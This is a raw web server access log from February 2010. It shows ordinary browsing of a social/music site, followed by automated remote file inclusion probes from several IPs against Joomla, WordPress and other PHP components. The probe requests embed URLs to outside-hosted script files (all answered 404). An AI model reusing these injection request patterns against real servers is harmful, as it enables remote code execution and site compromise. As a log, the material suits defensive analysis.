85.101.252.52 - - [18/Feb/2010:05:52:29 -0800] "GET /musim/stylefiles/style_common.css HTTP/1.1" 200 6125 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:29 -0800] "GET /musim/stylefiles/tipsy.css HTTP/1.1" 200 653 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:29 -0800] "GET /musim/stylefiles/style_profiler.css HTTP/1.1" 200 3314 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:29 -0800] "GET /musim/subbar/notifications.js HTTP/1.1" 200 2355 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:30 -0800] "GET /musim/subbar/subbar.css HTTP/1.1" 200 3197 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:30 -0800] "GET /musim/i3/Logo.png HTTP/1.1" 200 3664 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:30 -0800] "GET /musim/i3/IProfiles.png HTTP/1.1" 200 3059 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:30 -0800] "GET /musim/i3/IPictures.png HTTP/1.1" 200 279 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:30 -0800] "GET /musim/stylefiles/style_subbar.css HTTP/1.1" 200 804 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:30 -0800] "GET /musim/i3/IMusic.png HTTP/1.1" 200 270 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:30 -0800] "GET /musim/i3/newIncome.png HTTP/1.1" 200 383 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:30 -0800] "GET /musim/i3/oldIncome.png HTTP/1.1" 200 393 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:31 -0800] "GET /musim/i3/Blank.gif HTTP/1.1" 200 49 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:31 -0800] "GET /musim/i3/IApplications.png HTTP/1.1" 200 179 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:31 -0800] "GET /musim/i3/home.gif HTTP/1.1" 200 588 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:31 -0800] "GET /musim/i3/bc_bg.gif HTTP/1.1" 200 155 "http://www.puaga.com/musim/stylefiles/breadcrumb.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:31 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.4704959041224107 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:31 -0800] "GET /musim/subbar/meonline.php?nocache=0.3832373828457827 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:31 -0800] "GET /musim/subbar/niftyplayer.swf?as=0 HTTP/1.1" 200 3815 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:31 -0800] "GET /musim/i3/nonotifications.png HTTP/1.1" 200 316 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:31 -0800] "GET /musim/i3/playstop.png HTTP/1.1" 200 380 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:32 -0800] "GET /musim/i3/nonotifications.png HTTP/1.1" 200 316 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:32 -0800] "GET /musim/i3/bc_separator.gif HTTP/1.1" 200 546 "http://www.puaga.com/musim/stylefiles/breadcrumb.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:33 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.6038603133786852 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:34 -0800] "GET /musim/applications/welcome/index.php HTTP/1.1" 200 3221 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:34 -0800] "GET /musim/subbar/meonline.php?nocache=0.5746311227038018 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:34 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.7701165214580475 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:34 -0800] "GET /musim/applications/welcome/sidebar.php HTTP/1.1" 200 18 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:34 -0800] "GET /musim/applications/welcome/breadcrumb.php HTTP/1.1" 200 187 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:05:52:34 -0800] "GET /logs/access_100115.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:35 -0800] "GET /musim/applications/welcome/i/iActivities.png HTTP/1.1" 200 730 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:35 -0800] "GET /musim/applications/welcome/i/iPhotos.png HTTP/1.1" 200 760 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:35 -0800] "GET /musim/applications/welcome/i/iBoard.png HTTP/1.1" 200 770 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:35 -0800] "GET /musim/applications/welcome/i/iNotes.png HTTP/1.1" 200 484 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:35 -0800] "GET /musim/applications/welcome/i/iMusic.png HTTP/1.1" 200 831 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:35 -0800] "GET /musim/applications/welcome/i/iProfileCleaner.png HTTP/1.1" 200 812 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:35 -0800] "GET /musim/applications/welcome/i/iSiteInfo.png HTTP/1.1" 200 480 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:35 -0800] "GET /musim/applications/welcome/i/Boxe.png HTTP/1.1" 200 418 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:35 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.960742828873808 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:37 -0800] "GET /musim/subbar/meonline.php?nocache=0.7914627256919974 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:37 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.06912014023099922 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:38 -0800] "GET /musim/applications/welcome/i/iProfileViewer.png HTTP/1.1" 200 900 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:38 -0800] "GET /musim/applications/board/breadcrumb.php HTTP/1.1" 200 212 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:38 -0800] "GET /musim/applications/board/sidebar.php HTTP/1.1" 200 101 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:38 -0800] "GET /musim/applications/board/index.php HTTP/1.1" 200 1705 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:38 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.8910972514320411 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:39 -0800] "GET /musim/i/bg_button_a.gif HTTP/1.1" 200 524 "http://www.puaga.com/musim/stylefiles/breadcrumb-button.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:39 -0800] "GET /musim/i/bg_button_span.gif HTTP/1.1" 200 1183 "http://www.puaga.com/musim/stylefiles/breadcrumb-button.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:40 -0800] "GET /musim/subbar/meonline.php?nocache=0.5119055426334598 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:41 -0800] "GET /musim/applications/board/writer.php HTTP/1.1" 200 18 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:41 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.20260313668439378 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:41 -0800] "GET /musim/applications/board/listnews.php HTTP/1.1" 200 9530 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:42 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.8611375806735544 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:43 -0800] "GET /musim/subbar/meonline.php?nocache=0.797488766709938 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:43 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.7534017826159453 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:45 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.023237328762866438 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:46 -0800] "GET /musim/subbar/meonline.php?nocache=0.3443492813922939 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:46 -0800] "GET /musim/applications/profiler/index.php HTTP/1.1" 200 1484 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:46 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.8322527862683812 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:46 -0800] "GET /musim/applications/profiler/sidebar.php HTTP/1.1" 200 181 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:46 -0800] "GET /musim/applications/profiler/breadcrumb.php HTTP/1.1" 200 212 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:47 -0800] "GET /musim/i3/profile.png HTTP/1.1" 200 372 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:05:53:31 -0800] "GET /logs/access_100112.log%20%20/e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:05:53:31 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:05:53:31 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [18/Feb/2010:05:53:35 -0800] "GET /logs/access_100121.log/bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [18/Feb/2010:05:53:35 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [18/Feb/2010:05:53:36 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:05:53:40 -0800] "GET /logs/access_100115.log%20%20/e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:53:49 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:53:49 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:53:49 -0800] "GET /logs/access_100205.log//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:53:56 -0800] "GET /logs/access_100125.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:05:54:01 -0800] "GET /logs/access_100115.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:54:20 -0800] "GET /logs/access_100125.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:05:54:51 -0800] "GET /logs/access_100203.log//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:55:02 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:55:02 -0800] "GET /logs/access_100109.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:55:02 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [18/Feb/2010:05:55:08 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:55:18 -0800] "GET /logs/access_100126.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:56:52 -0800] "GET /myevent.php?myevent_path=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:56:52 -0800] "GET /logs/myevent.php?myevent_path=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:56:52 -0800] "GET /logs/access_100129.log%20%20/myevent.php?myevent_path=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
98.129.77.98 - - [18/Feb/2010:05:57:29 -0800] "GET /logs/access_100121.log/bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
98.129.77.98 - - [18/Feb/2010:05:57:29 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:57:49 -0800] "GET /logs/access_100128.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:57:50 -0800] "GET /logs/access_100128.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.54.174 - - [18/Feb/2010:05:58:20 -0800] "GET /logs/access_100104.log//components/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:58:37 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:58:38 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:58:38 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:58:38 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:58:44 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:58:52 -0800] "GET /logs/access_100122.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
